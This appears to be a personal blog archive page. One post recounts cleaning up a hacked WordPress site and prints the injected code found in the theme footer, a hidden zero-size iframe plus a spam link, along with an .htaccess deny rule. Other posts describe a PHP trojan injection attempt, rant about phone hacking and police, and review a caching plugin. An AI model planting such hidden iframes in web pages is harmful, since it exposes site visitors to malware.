A few days ago I got hacked. I quickly ripped out a heap of dodgy files left by the hackers but for some days now, Firefox, my browser, while viewing pages on this website, has been saying that it’s “downloading data from tructuyenso.vn… “.
This, of course, was not actually happening, as I’ve put the blockers on the whole of Vietnam using .htaccess! The reason for this is that initially, tructuyenso wasn’t the only site appearing in the progress tip – there was another which lasted until I got rid of the various files dumped on my website. This is how:
<Limit GET POST>
deny from 126.96.36.199/8
allow from all
However, the call was still being made from somewhere on my site as the progress indicator wouldn’t stop….
A search for the string “tructuyenso.vn” turned up nothing in the files on my website using my website host’s file manager. (In the end, this was my failing and I will not rely on the thing again!)
A search through my database also turned up zero.
TCPView is a download from Sysinternals.com (now Microsoft!) that shows the various net connections being made to one’s PC from everywhere. This immediately showed that as soon as the main strangelyperfect.tv website (not the backend WordPress admin area), fired up in Firefox, as many as 7 connections were simultaneously made to 188.8.131.52…… This is the IP address that holds tructuyenso.vn, plus 11 other domains, some of which I’d seen flash through the progress bar.
Even when closed by TCPView, the connections would immediately start up again to the same IP address, 184.108.40.206 (manually closing strangelyperfect.tv stopped the connections).
I had of course previously changed my FTP, mySQL databaase and site management passwords, but the link at the bottom to a Website malware & blacklist scan (Sucuri) was the killer! On visiting Sucuri, it instantly said that I was acting as a host for malware and gave the offending results, for free! (Of course, I wasn’t hosting malware – just that it gave an indication that I was and hence the slowness of the site to load as it tried and failed to download shite my way from Vietnam)
Checking the source code for my homepage (which in retrospect I should have done first!!) threw up “tructuyenso.vn” right at the very bottom. This is the code as it was when I checked:
<a href="http://tructuyenso.vn" title="Quang cao truc tuyen | Ban hang truc tuyen | Dien dan quang cao truc tuyen" > Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
This was then easily traced to the footer.php file in my theme, Suffusion.
It was simply stripped out and the website then worked fine….. but to be sure, I have downloaded then checked the footer file in a fresh theme download to be sure – it’s clean! I then uploaded a whole clean Suffusion theme in it’s entirety just in case any other theme files were compromised during the original hack yet were dormant, waiting for a trigger.
A recheck on Securi shows my website to be okay now. See screendump below. I’ll be using Securi a lot more!
I got a auto-alert from a Scamraiders post from Justin Asking that a page on one of the plethora of Willms self-promotional websites has been tampered with – and sure enough it has! See here for the original comment from Justin Asking.
Below is a screenshot of the hacked page, a brief perusal of the rest of the site shows no other tamperings…. Still. It made me laugh, although having had this website and the Crawling Chaos website hacked by Turks, I know that personally, it’s not a lot of fun. (I wonder if Willms will post about it and how long it’ll take to fix it…Probably got a lot on his plate, currently!)
Now, as soon as this happened, I thought “who has most to gain from the sinking of this protest ship?”
I immediately said, “The French” to my partner. It’s in their interest to get that pesky ship put of their test zone.
Many years passed until finally some French Secret Service agents were collared for the dastardly deed. President Mitterand, it turns out, authorised the bombing and thus the death of the Portuguese Dutch photographer, Fernando Pereira.
The news this week is that the sleaze-paper, News of the World (NOTW), part of the nationality-challenged Rupert Murdoch’s empire, hacked many prominent people’s phones in order to gather information. (News of the World ‘bugging’ claim – Wednesday 8th)
Later, the news was that there was going to be a huge investigation by the police into the allegations. (Police to probe phone hack claims – Thursday 9th). In fact, PM Brown said, “This raises questions that are serious and will obviously have to be answered.”
A few hours later, and the massive investigation was finished! (New phone hack inquiry ruled out – Thursday 8th) Second top Met Cop John Yates said, “No additional evidence has come to light since this case has concluded. I therefore consider that no further investigation is required.” He also said, “This investigation has not uncovered any evidence to suggest that John Prescott’s phone had been tapped.”
Warning: sarcasm alert!I think it’s amazing that Yates & Co. has managed to sift through all of this evidence in less than half a day! It’s fantastic! If only all enquiries were this fast! Arms to Iraq! Iraq War! Cash for Questions! G20 Tomkinson Death and Kettling tactics! You know, things would be so much better.
Who Has Most to Gain?
Rupert Murdoch - will he gain?
Going back to my Rainbow Warrior experience, this is the thought that now crosses my mind. In situations like this, forget the morals and any issues of integrity, personal or national, that arise. Just look at the question in it’s starkness. Who has most to gain?
Well this question really has several parts, or vantage points, if you like, that all supply an answer to the above question.
Obviously, The Guardian now gains from extra publicity, their oxygen of business.
NOTW originally gained by getting stories, the same oxygen of their business.
This is the relevant chunk, showing the information source as Richard Thomas, recently retired Information Commissioner and quoted verbatim from Preston’s blog. Thomas did a huge investigation into phone hacking which were presented before our Parliament, our representatives, in 2007. This is the chunk below (remember, see if you can see the key bit!!):
Richard Thomas, 'a champion of civil liberties'. Photo: Michael Stephens/ PA
A good deal of this trade in personal confidential information has already been exposed by Richard Thomas, who has just retired as information commissioner.
In a series of reports and in evidence to the House of Commons culture, media and sport committee, he made a series of disclosures about newspaper activities that he regarded as “prima facie” illegal.
Here’s a statement from him to MPs that he gave in March 2007, which refers to the results of an investigation he carried out into the business relationship between the press and a firm of private investigators (the investigation was given the codename Operation Motorman):
“The first thing I would need to share is that the 3,000 or 4,000 transactions identified… came from a total of 13,000 transactions in this one operation alone. We were careful only to put forward those where there was some sort of hard evidence of the transaction being positively identified as involving a journalist for a newspaper”.
And this is what he cited as the evidence of payments being made by journalists for the information:
“We did have, and we do have still, the statements, the bank statements, the invoices – some of these well-known proprietors were including information such as ‘payment for confidential information’, payment for ‘blagging’ [obtaining information by deception] in some cases – so there was what I might call hard ‘prima facie’ evidence.”
However the degree of detail obtained by him about this trade was startling.
Where did the money end up? Well, a flow-chart produced by the office of the information commissioner shows the press employing private detectives who in turn deal with phone companies, call centres, the DVLA and what’s described as “police source”.
Did you spot the last bit of the sentence? I’ll paraphrase now for emphasis…
Where did the money (paid for hacked information) end up? The information commissioner shows the press employing private detectives who deal with (…) a “police source“.
And there we have it!
Now we know why Yates’ “investigation” finished so quickly. The former information commisioner tells us in words presented to parliament – to protect the police!
Just remember, this current government has ramped up the “fear factor” over terrorism so much, that the police and other services have unparalled access to all sorts of electronic information. In fact, by law, telecoms companies are required to keep it….
In this week’s events we’ve seen the Police investigate an event of which they were one of the prime information sources (according to Thomas) and declared “no case to answer”. They are investigator, judge, jury and imprisoner.
As I’ve predicted many times in these pages, (and I’m only using history as a guide here, remember – I’m not a fortune teller), when the police are given unbridled power, that power will be abused either by an individual or the organisation as a whole.
The police now have power of arrest for virtually anything – e.g. by law, I’m not allowed to take their photo! I can be arrested and searched without reason and imprisoned for the same reasons indefinitely. Just look. It’s all there, all passed in the last few years.
But if this case and previous ones are anything to go by, it appears that if an “investigator” can’t get the information they want, they pay the police for it!
What have we got here – the Rockford Files!
And afterwards, the Police say “no case”. “Case closed”. “No further information”.
Our chickens have come home to roost, and no-one’s noticing!
Actually, someone’s noticing.
Director of Public Prosecutions Keir Starmer launches 'urgent' review of phone tap inquiry Photo: PA
The police have decided to do nothing because, as they say no NEW information is about (this is now being mis-quoted as in “There is no information that John Prescott’s phone was tapped” instead of “There is no NEW information that John Prescott’s phone was tapped” – which is a different thing altogether and those saying it, know it!)
And calls for the police to do the right thing and investigate properly are mounting.
I watch with anticipation from my little tank. I’ve a feeling, and I hope, that this one will run and run and that hopefully, some proper rein will be put on our law enforcement folk. Unlike most people, I don’t consider this a press freedom issue – I consider it a key part of all our freedoms.
As you can see SERVER[DOCUMENT ROOT]= is a part of php code and they’ve attempted to change my domain root to that of http://web.archive.org/web/20130611185214/http://www.foxreality.com/ which is part of Rupert Murdoch’s empire.
NOD32 NAC Trojan
The hyperlinks above don’t work as the code failed. However, if you are brave, strip out the first bit and just go to as I did, and hopefully, your anti-virus or browser will kick in with a malware warning like mine did! The malware is identified as a Trojan by my NOD32 anti-virus software as; PHP/Small.NAC trojan
Someone has dumped a piece of malware on the Fox network and is now going round blogs and other websites to get them to point to the trojan and thus spread the nefarious package. It just needs one click!
As I type this, at 2009-06-13 10:51:43 I had two more attacks!!! That’s nine in the last few minutes.
Checking the web for references, I’ve found this Russian webpage where the trojan has been tested against various antivirus programs – about half don’t detect it and it’s from the end of May this year! See link, translated into English.
Following on from my previous little post about DB Cache, I’ve been using it since that time and it seems to be faster to me from little old Blighty. I use a USA based host so anything I see has to cross the pond anyway, but in a non-logged-in state, page loading is definitely faster than it was. WP Super Cache is now consigned to the test bed of history. Long live DB Cache, ha, ha.
Seriously, DB Cache is faster than no caching and Super Cache from my viewpoint, and in the end, that’s what counts. And BTW, my permalinks work fine now, Hurrah!
Paradoxically, since this time, my host has had quite a few drop-outs and the web access has been lost intermittently. One time was due to the database server falling over but the rest have been web server issues as far as I can tell. The mail server has worked okay even when the web server has been off, as has the customer service system server! I can’t see how the DB Cache plugin is doing this – it’s just co-incidence, I’m 99% sure. Anyway, I’ve politely told iXWebhosting that their chances are running out and they’ve been very apologetic etc etc.
Over the last couple of days the strangest thought has plagued me. Two simple ugly words have kept emerging, only for me to lock them out and ridicule them as bizarre. Simon’s dead. Just to write it down feels like … Continue reading →
If you ever needed confirmation that the UK is not run by a shadowy cabal of sinister plotters but a bunch of chinless fucking idiots then the upcoming Digital Economy Bill is a good place to start. As well as … Continue reading →